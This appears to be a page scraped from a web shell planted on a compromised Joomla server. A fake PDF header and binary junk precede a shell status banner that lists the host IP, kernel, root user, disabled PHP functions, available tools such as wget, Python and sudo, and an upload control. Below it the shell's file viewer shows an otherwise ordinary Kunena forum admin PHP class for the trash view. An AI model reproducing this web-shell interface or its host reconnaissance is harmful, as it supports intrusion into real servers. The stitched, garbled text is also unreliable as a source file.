%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 49.231.201.246 / Your IP : 216.73.216.149 Web Server : Apache/2.4.18 (Ubuntu) System : Linux 246 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64 User : root ( 0) PHP Version : 7.0.33-0ubuntu0.16.04.16 Disable Function : exec,passthru,shell_exec,system,proc_open,popen,pcntl_exec MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/old/administrator/components/com_kunena/views/trash/ |
Upload File : |
<?php /** * Kunena Component * @package Kunena.Administrator * @subpackage Views * * @copyright (C) 2008 - 2014 Kunena Team. All rights reserved. * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL * @link http://www.kunena.org **/ defined ( '_JEXEC' ) or die (); /** * Trash view for Kunena backend */ class KunenaAdminViewTrash extends KunenaView { function displayDefault() { $this->setLayout($this->state->get('layout')); $this->trash_items = $this->get('Trashitems'); $this->pagination = $this->get ( 'Navigation' ); $this->view_options_list = $this->get ( 'ViewOptions' ); $this->sortFields = $this->getSortFields(); $this->sortDirectionFields = $this->getSortDirectionFields(); $this->filterSearch = $this->escape($this->state->get('list.search')); $this->filterTitle = $this->escape($this->state->get('filter.title')); $this->filterTopic = $this->escape($this->state->get('filter.topic')); $this->filterCategory = $this->escape($this->state->get('filter.category')); $this->filterIp = $this->escape($this->state->get('filter.ip')); $this->filterAuthor = $this->escape($this->state->get('filter.author')); $this->filterDate = $this->escape($this->state->get('filter.date')); $this->filterActive = $this->escape($this->state->get('filter.active')); $this->listOrdering = $this->escape($this->state->get('list.ordering')); $this->listDirection = $this->escape($this->state->get('list.direction')); $this->setToolBarDefault(); $this->display(); } function displayPurge() { $this->purgeitems = $this->get('PurgeItems'); $this->md5Calculated = $this->get('Md5'); $this->setToolBarPurge(); $this->display(); } protected function setToolBarDefault() { // Set the titlebar text JToolBarHelper::title ( JText::_('COM_KUNENA').': '.JText::_('COM_KUNENA_TRASH_MANAGER'), 'trash' ); JToolBarHelper::spacer(); if (version_compare(JVERSION, '3', '>')) { JToolBarHelper::custom('restore','checkin.png','checkin_f2.png', 'COM_KUNENA_TRASH_RESTORE'); } else { JToolBarHelper::custom('restore','restore.png','restore_f2.png', 'COM_KUNENA_TRASH_RESTORE'); } JToolBarHelper::divider(); JToolBarHelper::custom('purge','trash.png','trash_f2.png', 'COM_KUNENA_TRASH_PURGE'); JToolBarHelper::spacer(); } protected function setToolBarPurge() { // Set the titlebar text JToolBarHelper::title ( JText::_('COM_KUNENA'), 'kunena.png' ); JToolBarHelper::spacer(); JToolBarHelper::custom('purge','delete.png','delete_f2.png', 'COM_KUNENA_DELETE_PERMANENTLY'); JToolBarHelper::spacer(); } protected function getSortFields() { $sortFields = array(); if ($this->state->get('layout') == 'topics') { $sortFields[] = JHtml::_('select.option', 'title', JText::_('COM_KUNENA_TRASH_TITLE')); $sortFields[] = JHtml::_('select.option', 'category', JText::_('COM_KUNENA_TRASH_CATEGORY')); $sortFields[] = JHtml::_('select.option', 'author', JText::_('COM_KUNENA_TRASH_AUTHOR')); $sortFields[] = JHtml::_('select.option', 'time', JText::_('COM_KUNENA_TRASH_DATE')); } else { $sortFields[] = JHtml::_('select.option', 'title', JText::_('COM_KUNENA_TRASH_TITLE')); $sortFields[] = JHtml::_('select.option', 'topic', JText::_('COM_KUNENA_MENU_TOPIC')); $sortFields[] = JHtml::_('select.option', 'category', JText::_('COM_KUNENA_TRASH_CATEGORY')); $sortFields[] = JHtml::_('select.option', 'ip', JText::_('COM_KUNENA_TRASH_IP')); $sortFields[] = JHtml::_('select.option', 'author', JText::_('COM_KUNENA_TRASH_AUTHOR')); $sortFields[] = JHtml::_('select.option', 'time', JText::_('COM_KUNENA_TRASH_DATE')); } $sortFields[] = JHtml::_('select.option', 'id', JText::_('JGRID_HEADING_ID')); return $sortFields; } protected function getSortDirectionFields() { $sortDirection = array(); // $sortDirection[] = JHtml::_('select.option', 'asc', JText::_('JGLOBAL_ORDER_ASCENDING')); // $sortDirection[] = JHtml::_('select.option', 'desc', JText::_('JGLOBAL_ORDER_DESCENDING')); // TODO: remove it when J2.5 support is dropped $sortDirection[] = JHtml::_('select.option', 'asc', JText::_('COM_KUNENA_FIELD_LABEL_ASCENDING')); $sortDirection[] = JHtml::_('select.option', 'desc', JText::_('COM_KUNENA_FIELD_LABEL_DESCENDING')); return $sortDirection; } }